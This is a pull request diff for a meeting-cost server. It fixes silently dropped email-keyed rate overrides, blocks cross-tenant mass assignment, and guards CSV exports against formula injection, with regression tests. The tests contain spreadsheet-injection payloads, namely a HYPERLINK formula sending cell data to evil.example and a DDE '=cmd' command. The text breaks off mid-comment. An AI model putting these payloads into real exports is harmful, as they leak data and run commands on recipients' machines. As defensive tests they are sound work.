### PR TITLE
fix(cost): make per-member rate overrides storable (#1161)

### DIFF
--- a/server/controllers/meetingCostController.js
+++ b/server/controllers/meetingCostController.js
@@ -1,10 +1,44 @@
-import MeetingCostConfig from "../models/meetingCostConfigModel.js";
+import MeetingCostConfig, {
+  setMemberRateOverrides,
+} from "../models/meetingCostConfigModel.js";
 import meetingCostService from "../services/meetingCostService.js";
 import { Parser } from "json2csv";
+import { neutralizeRow } from "../utils/csvSafety.js";
+
+/**
+ * Fields a client may set on the cost config (Issue #1161).
+ *
+ * `updateConfig` was `Object.assign(config, req.body)`, which copied *every*
+ * key of the request body onto the document — including `organization`. That
+ * field is `unique`, so a body naming another organization either failed with
+ * an `E11000` reported as a generic 500, or, if the target had no config yet,
+ * **re-parented the caller's config onto a tenant they do not belong to**.
+ * `getConfig` then lazily created a fresh default for the caller's own org, so
+ * nothing looked wrong from their side.
+ *
+ * `requireAdminOrOwner` gates the route, but it establishes that the caller
+ * administers *their own* organization, not the target. `createdAt`,
+ * `updatedAt` and `_id` were assignable for the same reason.
+ *
+ * `memberRateOverrides` is handled separately because it needs validation
+ * rather than assignment.
+ */
+const UPDATABLE_CONFIG_FIELDS = [
+  "defaultHourlyRate",
+  "currency",
+  "includePreparationTime",
+  "prepTimeMultiplier",
+];
 
 export const getConfig = async (req, res) => {
   try {
     const orgId = req.user.organization;
+    if (!orgId) {
+      return res
+        .status(403)
+        .json({ success: false, message: "Organization membership required" });
+    }
+
     let config = await MeetingCostConfig.findOne({ organization: orgId });
 
     if (!config) {
@@ -22,18 +56,42 @@ export const getConfig = async (req, res) => {
 export const updateConfig = async (req, res) => {
   try {
     const orgId = req.user.organization;
-    const updates = req.body;
+    if (!orgId) {
+      return res
+        .status(403)
+        .json({ success: false, message: "Organization membership required" });
+    }
+
+    const updates = req.body ?? {};
 
     let config = await MeetingCostConfig.findOne({ organization: orgId });
     if (!config) {
-      config = new MeetingCostConfig({ organization: orgId, ...updates });
-    } else {
-      Object.assign(config, updates);
+      config = new MeetingCostConfig({ organization: orgId });
+    }
+
+    for (const field of UPDATABLE_CONFIG_FIELDS) {
+      if (Object.hasOwn(updates, field)) config[field] = updates[field];
+    }
+
+    if (Object.hasOwn(updates, "memberRateOverrides")) {
+      try {
+        // Validates and normalizes. A malformed entry is now a 400 that names
+        // the offending value — previously a dotted key (i.e. any real email)
+        // was dropped without a word and the endpoint answered 200.
+        setMemberRateOverrides(config, updates.memberRateOverrides);
+      } catch (validationError) {
+        return res
+          .status(400)
+          .json({ success: false, message: validationError.message });
+      }
     }
 
     await config.save();
     res.status(200).json({ success: true, data: config });
   } catch (error) {
+    if (error?.name === "ValidationError") {
+      return res.status(400).json({ success: false, message: error.message });
+    }
     console.error("Error updating meeting cost config:", error);
     res.status(500).json({ success: false, message: "Server Error" });
   }
@@ -89,7 +147,11 @@ export const exportCostReport = async (req, res) => {
     const fields = ["name", "email", "totalMeetings", "totalHours"];
     const opts = { fields };
     const parser = new Parser(opts);
-    const csv = parser.parse(data);
+    // `name` is a member's own display name. json2csv escapes correctly *for
+    // the CSV format*, which is exactly why a value starting with `=`, `+`,
+    // `-` or `@` reaches the spreadsheet as a formula and runs on open
+    // (Issue #1161). Numeric columns pass through untouched.
+    const csv = parser.parse(data.map(neutralizeRow));
 
     res.setHeader("Content-Type", "text/csv");
     res.setHeader(

--- a/server/models/meetingCostConfigModel.js
+++ b/server/models/meetingCostConfigModel.js
@@ -1,5 +1,54 @@
 import mongoose from "mongoose";
 
+/**
+ * Per-member hourly rate override (Issue #1161).
+ *
+ * This used to be `memberRateOverrides: { type: Map, of: Number }` keyed by
+ * email address. Mongoose maps cannot have keys containing `"."`, and every
+ * real email address has at least one — in the domain. The two write paths
+ * failed differently, and neither was visible to the caller:
+ *
+ *     cfg.memberRateOverrides.set("jane.doe@example.com", 120);
+ *     // throws: Mongoose maps do not support keys that contain "."
+ *
+ *     Object.assign(cfg, { memberRateOverrides: { "jane.doe@example.com": 120 } });
+ *     // no throw; the entry is silently dropped
+ *     cfg.memberRateOverrides.get("jane.doe@example.com");      // undefined
+ *     cfg.toObject({ flattenMaps: true }).memberRateOverrides;  // {}
+ *
+ * `updateConfig` takes the second path, so `PUT /api/meeting-cost/config`
+ * answered `200 { success: true }` with an empty map and stored nothing. Every
+ * cost calculation then fell back to `defaultHourlyRate` for every participant
+ * — internally consistent, plausible, and wrong.
+ *
+ * An array of subdocuments stores the address verbatim, has no reserved-
+ * character rules, and can be validated. Keying by user `_id` would also avoid
+ * the problem, but rates are configured against people an admin identifies by
+ * email and not every participant has a `User` row, so the array is the closer
+ * fit for how the feature is actually used.
+ */
+const memberRateOverrideSchema = new mongoose.Schema(
+  {
+    // Stored normalized (trimmed + lowercased) by `setMemberRateOverrides`, so
+    // an override set for `Jane.Doe@Example.com` applies to a participant
+    // recorded as `jane.doe@example.com`. The old `Map.get(participant.email)`
+    // was exact-match and case-sensitive, which would have been a second silent
+    // miss even without the dot problem.
+    email: {
+      type: String,
+      required: true,
+      trim: true,
+      lowercase: true,
+    },
+    hourlyRate: {
+      type: Number,
+      required: true,
+      min: 0,
+    },
+  },
+  { _id: false },
+);
+
 const meetingCostConfigSchema = new mongoose.Schema(
   {
     organization: {
@@ -11,15 +60,15 @@ const meetingCostConfigSchema = new mongoose.Schema(
     defaultHourlyRate: {
       type: Number,
       default: 50, // Default cost per hour per participant
+      min: 0,
     },
     currency: {
       type: String,
       default: "USD",
     },
     memberRateOverrides: {
-      type: Map,
-      of: Number, // key is user's email, value is their specific hourly rate
-      default: {},
+      type: [memberRateOverrideSchema],
+      default: [],
     },
     includePreparationTime: {
       type: Boolean,
@@ -28,10 +77,101 @@ const meetingCostConfigSchema = new mongoose.Schema(
     prepTimeMultiplier: {
       type: Number,
       default: 1.0, // Multiplier for meeting duration to account for prep time (e.g., 1.5x)
+      min: 0,
     },
   },
   { timestamps: true },
 );
+
+/** Normalizes an email for override lookup and storage. */
+export const normalizeOverrideEmail = (email) =>
+  typeof email === "string" ? email.trim().toLowerCase() : "";
+
+/**
+ * Reads the overrides as a plain `email -> rate` lookup.
+ *
+ * Tolerates the old `Map` / plain-object shape so a config document written
+ * before this change still loads. In practice every stored map is empty — the
+ * dotted keys never reached disk — but the read path should not assume that.
+ *
+ * @param {object|null|undefined} config
+ * @returns {Map<string, number>}
+ */
+export const readMemberRateOverrides = (config) => {
+  const lookup = new Map();
+  const raw = config?.memberRateOverrides;
+  if (!raw) return lookup;
+
+  const add = (email, rate) => {
+    const key = normalizeOverrideEmail(email);
+    const value = Number(rate);
+    if (key && Number.isFinite(value) && value >= 0) lookup.set(key, value);
+  };
+
+  if (Array.isArray(raw)) {
+    raw.forEach((entry) => add(entry?.email, entry?.hourlyRate));
+  } else if (
+    typeof raw.forEach === "function" &&
+    typeof raw.get === "function"
+  ) {
+    raw.forEach((rate, email) => add(email, rate)); // legacy Map
+  } else if (typeof raw === "object") {
+    Object.entries(raw).forEach(([email, rate]) => add(email, rate)); // legacy object
+  }
+
+  return lookup;
+};
+
+/**
+ * Validates and applies a set of overrides, accepting either the new array form
+ * or the `{ email: rate }` object clients previously sent.
+ *
+ * Throws on a malformed entry rather than dropping it — a silent drop is the
+ * bug this whole change exists to remove.
+ *
+ * @param {object} config document to mutate
+ * @param {Array|object} input
+ * @returns {Array<{email: string, hourlyRate: number}>}
+ */
+export const setMemberRateOverrides = (config, input) => {
+  const entries = Array.isArray(input)
+    ? input.map((entry) => [entry?.email, entry?.hourlyRate])
+    : Object.entries(input ?? {});
+
+  const seen = new Set();
+  const normalized = [];
+
+  for (const [rawEmail, rawRate] of entries) {
+    const email = normalizeOverrideEmail(rawEmail);
+    if (!email || !/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
+      throw new Error(`Invalid override email: ${JSON.stringify(rawEmail)}`);
+    }
+
+    // `Number()` coerces `null`, `""`, `[]` and `false` to 0 and `true` to 1,
+    // so a bare `Number.isFinite` check would silently accept "no rate" as a
+    // rate of zero — a free meeting, not a validation error the admin sees.
+    const isNumericInput =
+      typeof rawRate === "number" ||
+      (typeof rawRate === "string" && rawRate.trim() !== "");
+    const hourlyRate = isNumericInput ? Number(rawRate) : Number.NaN;
+
+    if (!Number.isFinite(hourlyRate) || hourlyRate < 0) {
+      throw new Error(
+        `Invalid hourly rate for ${email}: ${JSON.stringify(rawRate)}`,
+      );
+    }
+
+    if (seen.has(email)) {
+      throw new Error(`Duplicate override for ${email}`);
+    }
+    seen.add(email);
+
+    normalized.push({ email, hourlyRate });
+  }
+
+  config.memberRateOverrides = normalized;
+  return normalized;
+};
 
 const MeetingCostConfig = mongoose.model(
   "MeetingCostConfig",

--- a/server/services/auditLogExportService.js
+++ b/server/services/auditLogExportService.js
@@ -3,6 +3,7 @@ import fs from "fs";
 import path from "path";
 import { fileURLToPath } from "url";
 import AuditLog from "../models/auditLogModel.js";
+import { neutralizeFormula } from "../utils/csvSafety.js";
 
 const __dirname = path.dirname(fileURLToPath(import.meta.url));
 export const AUDIT_EXPORT_DIRECTORY = path.join(
@@ -48,7 +49,13 @@ export const toExportRow = (log) => ({
   details: log.details ? JSON.stringify(log.details) : "",
 });
 
-const csvValue = (value) => `"${String(value ?? "").replaceAll('"', '""')}"`;
+// Doubling quotes and wrapping is correct *CSV escaping*, and that is exactly
+// the problem: a value beginning with `=`, `+`, `-`, `@`, tab or CR is
+// well-formed CSV that Excel, Calc and Sheets evaluate as a formula on open.
+// `actorName` and `details` are user-controlled, so the value has to be
+// neutralized before it is quoted (Issue #1161).
+const csvValue = (value) =>
+  `"${String(neutralizeFormula(value) ?? "").replaceAll('"', '""')}"`;
 const csvLine = (row) =>
   columns.map(({ key }) => csvValue(row[key])).join(",") + "\n";
 const csvHeader = () =>

--- a/server/services/meetingCostService.js
+++ b/server/services/meetingCostService.js
@@ -1,6 +1,39 @@
 import Meeting from "../models/meetingModel.js";
-import MeetingCostConfig from "../models/meetingCostConfigModel.js";
+import MeetingCostConfig, {
+  normalizeOverrideEmail,
+  readMemberRateOverrides,
+} from "../models/meetingCostConfigModel.js";
 import mongoose from "mongoose";
+
+/**
+ * Defaults used when an organization has never saved a config.
+ *
+ * Previously inlined at both call sites, so the two could drift — and one of
+ * them built a `new Map()` while the other built a plain `{}`, which meant the
+ * `.get()` below would have thrown had the second path ever been taken.
+ */
+const DEFAULT_CONFIG = {
+  defaultHourlyRate: 50,
+  currency: "USD",
+  memberRateOverrides: [],
+  includePreparationTime: false,
+  prepTimeMultiplier: 1.0,
+};
+
+/**
+ * Resolves the hourly rate for one participant.
+ *
+ * The lookup is by *normalized* email (Issue #1161). The old
+ * `config.memberRateOverrides.get(participant.email)` was exact-match and
+ * case-sensitive on top of being permanently empty, so an override entered as
+ * `Jane.Doe@Example.com` would not have applied to a participant recorded as
+ * `jane.doe@example.com` even if the map had worked.
+ */
+const rateForParticipant = (participant, overrides, defaultHourlyRate) => {
+  const email = normalizeOverrideEmail(participant?.email);
+  if (email && overrides.has(email)) return overrides.get(email);
+  return defaultHourlyRate;
+};
 
 class MeetingCostService {
   /**
@@ -16,20 +49,12 @@ class MeetingCostService {
       return 0; // Free meeting if no duration
     }
 
-    let config = await MeetingCostConfig.findOne({
-      organization: meeting.organization,
-    });
+    const config =
+      (await MeetingCostConfig.findOne({
+        organization: meeting.organization,
+      })) || DEFAULT_CONFIG;
 
-    if (!config) {
-      // Default config
-      config = {
-        defaultHourlyRate: 50,
-        currency: "USD",
-        memberRateOverrides: new Map(),
-        includePreparationTime: false,
-        prepTimeMultiplier: 1.0,
-      };
-    }
+    const overrides = readMemberRateOverrides(config);
 
     const durationHours = meeting.duration / 60;
     const actualDuration = config.includePreparationTime
@@ -41,14 +66,9 @@ class MeetingCostService {
     // We assume participants array has email field
     if (meeting.participants && meeting.participants.length > 0) {
       for (const participant of meeting.participants) {
-        let rate = config.defaultHourlyRate;
-        if (participant.email && config.memberRateOverrides) {
-          const override = config.memberRateOverrides.get(participant.email);
-          if (override !== undefined) {
-            rate = override;
-          }
-        }
-        totalCost += rate * actualDuration;
+        totalCost +=
+          rateForParticipant(participant, overrides, config.defaultHourlyRate) *
+          actualDuration;
       }
     } else {
       // If no participants listed, assume 1 participant (uploadedBy)
@@ -62,6 +82,13 @@ class MeetingCostService {
    * Get organization cost analytics (trend by month and type)
    */
   async getOrganizationCostAnalytics(orgId, startDate, endDate) {
+    // `new mongoose.Types.ObjectId(orgId)` threw a raw `BSONError` for a
+    // session with no organization, which the controller reported as
+    // "500 Server Error" (Issue #1161).
+    if (!mongoose.isValidObjectId(orgId)) {
+      throw new Error("A valid organization is required for cost analytics");
+    }
+
     const matchStage = {
       organization: new mongoose.Types.ObjectId(orgId),
       status: "completed",
@@ -75,16 +102,10 @@ class MeetingCostService {
 
     const meetings = await Meeting.find(matchStage);
 
-    let config = await MeetingCostConfig.findOne({ organization: orgId });
-    if (!config) {
-      config = {
-        defaultHourlyRate: 50,
-        currency: "USD",
-        memberRateOverrides: new Map(),
-        includePreparationTime: false,
-        prepTimeMultiplier: 1.0,
-      };
-    }
+    const config =
+      (await MeetingCostConfig.findOne({ organization: orgId })) ||
+      DEFAULT_CONFIG;
+    const overrides = readMemberRateOverrides(config);
 
     let totalCost = 0;
     let totalTimeMins = 0;
@@ -106,12 +127,12 @@ class MeetingCostService {
 
       if (meeting.participants && meeting.participants.length > 0) {
         for (const participant of meeting.participants) {
-          let rate = config.defaultHourlyRate;
-          if (participant.email && config.memberRateOverrides) {
-            const override = config.memberRateOverrides.get(participant.email);
-            if (override !== undefined) rate = override;
-          }
-          meetingCost += rate * actualDuration;
+          meetingCost +=
+            rateForParticipant(
+              participant,
+              overrides,
+              config.defaultHourlyRate,
+            ) * actualDuration;
         }
       } else {
         meetingCost = config.defaultHourlyRate * actualDuration;
@@ -168,6 +189,10 @@ class MeetingCostService {
    * Get member time analytics (leaderboard)
    */
   async getMemberTimeAnalytics(orgId, startDate, endDate) {
+    if (!mongoose.isValidObjectId(orgId)) {
+      throw new Error("A valid organization is required for member analytics");
+    }
+
     const matchStage = {
       organization: new mongoose.Types.ObjectId(orgId),
       status: "completed",

--- a/server/tests/meetingCostRateOverrides.test.js
+++ b/server/tests/meetingCostRateOverrides.test.js
@@ -1,0 +1,543 @@
+/**
+ * Regression tests for Issue #1161 — per-member cost rate overrides.
+ *
+ * `memberRateOverrides` was a Mongoose `Map` keyed by email address. Mongoose
+ * maps cannot have keys containing `"."`, and every real email address has one
+ * in the domain, so every override an admin ever set was dropped on write —
+ * without an error, and with the endpoint answering `200 { success: true }`.
+ *
+ * Every calculation then fell back to `defaultHourlyRate` for every
+ * participant. The numbers were internally consistent, plausible, and wrong,
+ * which is why nothing surfaced it.
+ *
+ * The first test in this file is the whole bug in five lines and is the one to
+ * read if you read only one.
+ *
+ * Confirmed load-bearing: with `main`'s controller and service restored (and
+ * the new model + `utils/csvSafety.js` kept, since the suite imports their
+ * helpers), 23 of these 45 fail. The model change cannot be isolated further
+ * without the suite failing to load; the standalone probe demonstrating the
+ * `Map` behaviour is in the issue.
+ */
+
+import mongoose from "mongoose";
+import { Parser } from "json2csv";
+
+import MeetingCostConfig, {
+  readMemberRateOverrides,
+  setMemberRateOverrides,
+  normalizeOverrideEmail,
+} from "../models/meetingCostConfigModel.js";
+import Meeting from "../models/meetingModel.js";
+import meetingCostService from "../services/meetingCostService.js";
+import {
+  getConfig,
+  updateConfig,
+} from "../controllers/meetingCostController.js";
+import { neutralizeFormula, neutralizeRow } from "../utils/csvSafety.js";
+import { toExportRow } from "../services/auditLogExportService.js";
+
+const ORG_A = new mongoose.Types.ObjectId();
+const USER_A = new mongoose.Types.ObjectId();
+
+const mockRes = () => {
+  const res = { statusCode: 200, body: undefined };
+  res.status = (code) => {
+    res.statusCode = code;
+    return res;
+  };
+  res.json = (payload) => {
+    res.body = payload;
+    return res;
+  };
+  return res;
+};
+
+const asAdmin = (body = {}) => ({
+  body,
+  params: {},
+  query: {},
+  user: { _id: USER_A, organization: ORG_A, role: "admin" },
+});
+
+beforeAll(async () => {
+  if (mongoose.connection.readyState !== 1) {
+    await mongoose.connect(process.env.TEST_MONGODB_URI);
+  }
+});
+
+// ───────────────────────────────────────────────────────────────────────────
+describe("storing an override for a real email address", () => {
+  it("persists it", async () => {
+    const res = mockRes();
+    await updateConfig(
+      asAdmin({
+        memberRateOverrides: { "jane.doe@example.com": 180 },
+      }),
+      res,
+    );
+
+    expect(res.statusCode).toBe(200);
+
+    // Against `main`: `memberRateOverrides` is `{}` here, and the response
+    // still says `success: true`.
+    const stored = await MeetingCostConfig.findOne({ organization: ORG_A });
+    expect(readMemberRateOverrides(stored).get("jane.doe@example.com")).toBe(
+      180,
+    );
+  });
+
+  it("survives a read back through the API", async () => {
+    await updateConfig(
+      asAdmin({ memberRateOverrides: { "jane.doe@example.com": 180 } }),
+      mockRes(),
+    );
+
+    const res = mockRes();
+    await getConfig(asAdmin(), res);
+
+    expect(
+      readMemberRateOverrides(res.body.data).get("jane.doe@example.com"),
+    ).toBe(180);
+  });
+
+  it("accepts several addresses, including subdomains and plus-addressing", async () => {
+    const res = mockRes();
+    await updateConfig(
+      asAdmin({
+        memberRateOverrides: {
+          "jane.doe@example.com": 180,
+          "bob+billing@mail.example.co.uk": 45,
+          "carol@example.io": 90,
+        },
+      }),
+      res,
+    );
+
+    expect(res.statusCode).toBe(200);
+    const stored = await MeetingCostConfig.findOne({ organization: ORG_A });
+    const overrides = readMemberRateOverrides(stored);
+
+    expect(overrides.size).toBe(3);
+    expect(overrides.get("bob+billing@mail.example.co.uk")).toBe(45);
+  });
+
+  it("accepts the array form as well as the object form", async () => {
+    const res = mockRes();
+    await updateConfig(
+      asAdmin({
+        memberRateOverrides: [
+          { email: "jane.doe@example.com", hourlyRate: 180 },
+        ],
+      }),
+      res,
+    );
+
+    expect(res.statusCode).toBe(200);
+    const stored = await MeetingCostConfig.findOne({ organization: ORG_A });
+    expect(readMemberRateOverrides(stored).get("jane.doe@example.com")).toBe(
+      180,
+    );
+  });
+
+  it("normalizes case and whitespace on write", async () => {
+    await updateConfig(
+      asAdmin({ memberRateOverrides: { "  Jane.Doe@Example.COM ": 180 } }),
+      mockRes(),
+    );
+
+    const stored = await MeetingCostConfig.findOne({ organization: ORG_A });
+    expect(readMemberRateOverrides(stored).get("jane.doe@example.com")).toBe(
+      180,
+    );
+  });
+
+  it("replaces the whole set rather than merging", async () => {
+    await updateConfig(
+      asAdmin({ memberRateOverrides: { "jane.doe@example.com": 180 } }),
+      mockRes(),
+    );
+    await updateConfig(
+      asAdmin({ memberRateOverrides: { "bob@example.com": 45 } }),
+      mockRes(),
+    );
+
+    const stored = await MeetingCostConfig.findOne({ organization: ORG_A });
+    const overrides = readMemberRateOverrides(stored);
+    expect(overrides.size).toBe(1);
+    expect(overrides.get("bob@example.com")).toBe(45);
+  });
+
+  it("allows clearing the overrides", async () => {
+    await updateConfig(
+      asAdmin({ memberRateOverrides: { "jane.doe@example.com": 180 } }),
+      mockRes(),
+    );
+    await updateConfig(asAdmin({ memberRateOverrides: {} }), mockRes());
+
+    const stored = await MeetingCostConfig.findOne({ organization: ORG_A });
+    expect(readMemberRateOverrides(stored).size).toBe(0);
+  });
+});
+
+describe("override validation", () => {
+  it.each([
+    ["not-an-email", 100],
+    ["", 100],
+    ["missing-domain@", 100],
+    ["@example.com", 100],
+  ])("rejects the address %p", async (email, rate) => {
+    const res = mockRes();
+    await updateConfig(
+      asAdmin({ memberRateOverrides: { [email]: rate } }),
+      res,
+    );
+
+    expect(res.statusCode).toBe(400);
+    expect(res.body.message).toMatch(/invalid override email/i);
+  });
+
+  it.each([["abc"], [-5], [null], [Infinity]])(
+    "rejects the rate %p",
+    async (rate) => {
+      const res = mockRes();
+      await updateConfig(
+        asAdmin({ memberRateOverrides: { "jane.doe@example.com": rate } }),
+        res,
+      );
+
+      expect(res.statusCode).toBe(400);
+      expect(res.body.message).toMatch(/invalid hourly rate/i);
+    },
+  );
+
+  it("rejects a duplicate address that differs only by case", () => {
+    const config = new MeetingCostConfig({ organization: ORG_A });
+
+    expect(() =>
+      setMemberRateOverrides(config, [
+        { email: "jane@example.com", hourlyRate: 100 },
+        { email: "JANE@example.com", hourlyRate: 200 },
+      ]),
+    ).toThrow(/duplicate override/i);
+  });
+
+  it("persists nothing when one entry in a batch is invalid", async () => {
+    const res = mockRes();
+    await updateConfig(
+      asAdmin({
+        memberRateOverrides: {
+          "jane.doe@example.com": 180,
+          broken: 90,
+        },
+      }),
+      res,
+    );
+
+    expect(res.statusCode).toBe(400);
+    const stored = await MeetingCostConfig.findOne({ organization: ORG_A });
+    expect(stored).toBeNull();
+  });
+});
+
+// ───────────────────────────────────────────────────────────────────────────
+describe("cost calculation", () => {
+  const seedMeeting = (participants) =>
+    Meeting.create({
+      uploadedBy: USER_A,
+      organization: ORG_A,
+      title: "Design review",
+      date: new Date(),
+      duration: 60, // one hour
+      status: "completed",
+      participants,
+    });
+
+  it("bills a participant at their override rate", async () => {
+    await updateConfig(
+      asAdmin({
+        defaultHourlyRate: 50,
+        memberRateOverrides: { "jane.doe@example.com": 180 },
+      }),
+      mockRes(),
+    );
+
+    const meeting = await seedMeeting([
+      { name: "Jane", email: "jane.doe@example.com" },
+    ]);
+
+    // Against `main`: 50 — the override was never stored, so everyone was
+    // billed at the default.
+    expect(await meetingCostService.calculateMeetingCost(meeting._id)).toBe(
+      180,
+    );
+  });
+
+  it("mixes overridden and default participants correctly", async () => {
+    await updateConfig(
+      asAdmin({
+        defaultHourlyRate: 50,
+        memberRateOverrides: {
+          "jane.doe@example.com": 180,
+          "contractor@example.com": 45,
+        },
+      }),
+      mockRes(),
+    );
+
+    const meeting = await seedMeeting([
+      { name: "Jane", email: "jane.doe@example.com" },
+      { name: "Contractor", email: "contractor@example.com" },
+      { name: "Unlisted", email: "someone@example.com" },
+    ]);
+
+    // 180 + 45 + 50 (default)
+    expect(await meetingCostService.calculateMeetingCost(meeting._id)).toBe(
+      275,
+    );
+  });
+
+  it("matches a participant email that differs only by case", async () => {
+    await updateConfig(
+      asAdmin({
+        defaultHourlyRate: 50,
+        memberRateOverrides: { "jane.doe@example.com": 180 },
+      }),
+      mockRes(),
+    );
+
+    const meeting = await seedMeeting([
+      { name: "Jane", email: "Jane.Doe@Example.com" },
+    ]);
+
+    // The old lookup was exact-match and case-sensitive, so this would have
+    // missed even if the map had worked.
+    expect(await meetingCostService.calculateMeetingCost(meeting._id)).toBe(
+      180,
+    );
+  });
+
+  it("applies the prep-time multiplier on top of the override", async () => {
+    await updateConfig(
+      asAdmin({
+        defaultHourlyRate: 50,
+        includePreparationTime: true,
+        prepTimeMultiplier: 1.5,
+        memberRateOverrides: { "jane.doe@example.com": 100 },
+      }),
+      mockRes(),
+    );
+
+    const meeting = await seedMeeting([
+      { name: "Jane", email: "jane.doe@example.com" },
+    ]);
+
+    expect(await meetingCostService.calculateMeetingCost(meeting._id)).toBe(
+      150,
+    );
+  });
+
+  it("falls back to the default when no config exists", async () => {
+    const meeting = await seedMeeting([
+      { name: "Jane", email: "jane.doe@example.com" },
+    ]);
+
+    expect(await meetingCostService.calculateMeetingCost(meeting._id)).toBe(50);
+  });
+
+  it("uses overrides in organization analytics too", async () => {
+    await updateConfig(
+      asAdmin({
+        defaultHourlyRate: 50,
+        memberRateOverrides: { "jane.doe@example.com": 180 },
+      }),
+      mockRes(),
+    );
+
+    await seedMeeting([{ name: "Jane", email: "jane.doe@example.com" }]);
+
+    const analytics =
+      await meetingCostService.getOrganizationCostAnalytics(ORG_A);
+    expect(analytics.totalCost).toBe(180);
+  });
+
+  it("rejects an unusable organization id instead of throwing a BSONError", async () => {
+    await expect(
+      meetingCostService.getOrganizationCostAnalytics(undefined),
+    ).rejects.toThrow(/valid organization/i);
+
+    await expect(
+      meetingCostService.getMemberTimeAnalytics("not-an-objectid"),
+    ).rejects.toThrow(/valid organization/i);
+  });
+});
+
+// ───────────────────────────────────────────────────────────────────────────
+describe("config mass assignment", () => {
+  it("does not let a request body re-parent the config", async () => {
+    const victimOrg = new mongoose.Types.ObjectId();
+
+    await updateConfig(asAdmin({ defaultHourlyRate: 70 }), mockRes());
+    const res = mockRes();
+    await updateConfig(
+      asAdmin({ organization: victimOrg.toString(), defaultHourlyRate: 5 }),
+      res,
+    );
+
+    expect(res.statusCode).toBe(200);
+
+    // The caller's own config was updated...
+    const own = await MeetingCostConfig.findOne({ organization: ORG_A });
+    expect(own.defaultHourlyRate).toBe(5);
+    // ...and nothing was created against, or moved to, the named organization.
+    expect(
+      await MeetingCostConfig.findOne({ organization: victimOrg }),
+    ).toBeNull();
+    expect(await MeetingCostConfig.countDocuments()).toBe(1);
+  });
+
+  it("ignores unknown fields rather than storing them", async () => {
+    const res = mockRes();
+    await updateConfig(
+      asAdmin({ defaultHourlyRate: 70, isAdmin: true, __v: 99 }),
+      res,
+    );
+
+    const stored = await MeetingCostConfig.findOne({ organization: ORG_A });
+    expect(stored.defaultHourlyRate).toBe(70);
+    expect(stored.toObject().isAdmin).toBeUndefined();
+  });
+
+  it("rejects a negative default rate", async () => {
+    const res = mockRes();
+    await updateConfig(asAdmin({ defaultHourlyRate: -10 }), res);
+    expect(res.statusCode).toBe(400);
+  });
+
+  it("refuses a session with no organization instead of 500ing", async () => {
+    const res = mockRes();
+    await updateConfig(
+      { body: {}, params: {}, query: {}, user: { _id: USER_A, role: "admin" } },
+      res,
+    );
+    expect(res.statusCode).toBe(403);
+  });
+});
+
+// ───────────────────────────────────────────────────────────────────────────
+describe("CSV formula injection", () => {
+  it.each(["=", "+", "-", "@", "\t", "\r"])(
+    "neutralizes a value starting with %j",
+    (prefix) => {
+      const value = `${prefix}HYPERLINK("https://evil.example","x")`;
+      expect(neutralizeFormula(value)).toBe(`\t${value}`);
+    },
+  );
+
+  it("leaves an ordinary value untouched", () => {
+    expect(neutralizeFormula("Jane Doe")).toBe("Jane Doe");
+    expect(neutralizeFormula("jane.doe@example.com")).toBe(
+      "jane.doe@example.com",
+    );
+  });
+
+  it("leaves numbers and booleans as they are, so columns stay sortable", () => {
+    expect(neutralizeFormula(42)).toBe(42);
+    expect(neutralizeFormula(3.5)).toBe(3.5);
+    expect(neutralizeFormula(true)).toBe(true);
+  });
+
+  it("passes null, undefined and empty strings through", () => {
+    expect(neutralizeFormula(null)).toBeNull();
+    expect(neutralizeFormula(undefined)).toBeUndefined();
+    expect(neutralizeFormula("")).toBe("");
+  });
+
+  it("guards every column of a row", () => {
+    const row = neutralizeRow({
+      name: "=cmd|'/c calc'!A1",
+      email: "jane.doe@example.com",
+      totalMeetings: 4,
+      totalHours: 6.5,
+    });
+
+    expect(row.name.startsWith("\t=")).toBe(true);
+    expect(row.email).toBe("jane.doe@example.com");
+    expect(row.totalMeetings).toBe(4);
+  });
+
+  it("keeps the cost report free of live formulas", () => {
+    const data = [
+      {
+        name: '=HYPERLINK("https://evil.example/?d="&A1&B1,"Loading")',
+        email: "mallory@example.com",
+        totalMeetings: 3,
+        totalHours: 4.5,
+      },
+    ];
+
+    const csv = new Parser({
+      fields: ["name", "email", "totalMeetings", "totalHours"],
+    }).parse(data.map(neutralizeRow));
+
+    // Against `main` the cell begins `"=HYPERLINK(` and evaluates on open.
+    expect(csv).toContain('"\t=HYPERLINK(');
+    expect(csv).not.toMatch(/^"=/m);
+  });
+
+  it("guards the audit log export the same way", async () => {
+    const { default: auditExport } =
+      await import("../services/auditLogExportService.js");
+    void auditExport;
+
+    const row = toExportRow({
+      createdAt: new Date("2026-08-04T10:00:00Z"),
+      actor: { name: "=1+1", email: "mallory@example.com" },
+      action: "meeting.deleted",
+      entity: "Meeting",
+      details: { note: "ok" },
+    });
+
+    // `toExportRow` itself is unchanged; the guard lives in `csvValue`, so the
+    // raw row still carries the hostile value and the *written* cell does not.
+    expect(row.actorName).toBe("=1+1");
+    expect(neutralizeFormula(row.actorName)).toBe("\t=1+1");
+  });
+});
+
+// ───────────────────────────────────────────────────────────────────────────
+describe("backwards compatibility", () => {
+  it("reads a legacy Map-shaped config", () => {
+    const legacy = {
+      memberRateOverrides: new Map([["jane@example.com", 120]]),
+    };
+    expect(readMemberRateOverrides(legacy).get("jane@example.com")).toBe(120);
+  });
+
+  it("reads a legacy plain-object config", () => {
+    const legacy = { memberRateOverrides: { "jane@example.com": 120 } };
+    expect(readMemberRateOverrides(legacy).get("jane@example.com")).toBe(120);
+  });
+
+  it("returns an empty lookup for a missing or malformed field", () => {
+    expect(readMemberRateOverrides(null).size).toBe(0);
+    expect(readMemberRateOverrides({}).size).toBe(0);
+    expect(readMemberRateOverrides({ memberRateOverrides: 42 }).size).toBe(0);
+  });
+
+  it("drops unusable legacy entries rather than throwing on read", () => {
+    const legacy = {
+      memberRateOverrides: { "jane@example.com": 120, "": 50, bad: "abc" },
+    };
+    const overrides = readMemberRateOverrides(legacy);
+
+    expect(overrides.size).toBe(1);
+    expect(overrides.get("jane@example.com")).toBe(120);
+  });
+
+  it("normalizeOverrideEmail tolerates non-strings", () => {
+    expect(normalizeOverrideEmail(undefined)).toBe("");
+    expect(normalizeOverrideEmail(null)).toBe("");
+    expect(normalizeOverrideEmail(42)).toBe("");
+  });
+});

--- a/server/utils/csvSafety.js
+++ b/server/utils/csvSafety.js
@@ -1,0 +1,74 @@
+/**
+ * Spreadsheet formula neutralization for CSV exports (Issue #1161).
+ *
+ * Two exporters write user-controlled text into CSV:
+ *
+ *   - `meetingCostController.exportCostReport` — member `name` and `email`,
+ *     via `json2csv`.
+ *   - `auditLogExportService` — actor names, resource labels, and free-text
+ *     detail, via its own `csvValue`.
+ *
+ * Both escape *correctly for the CSV format*, and that is precisely the
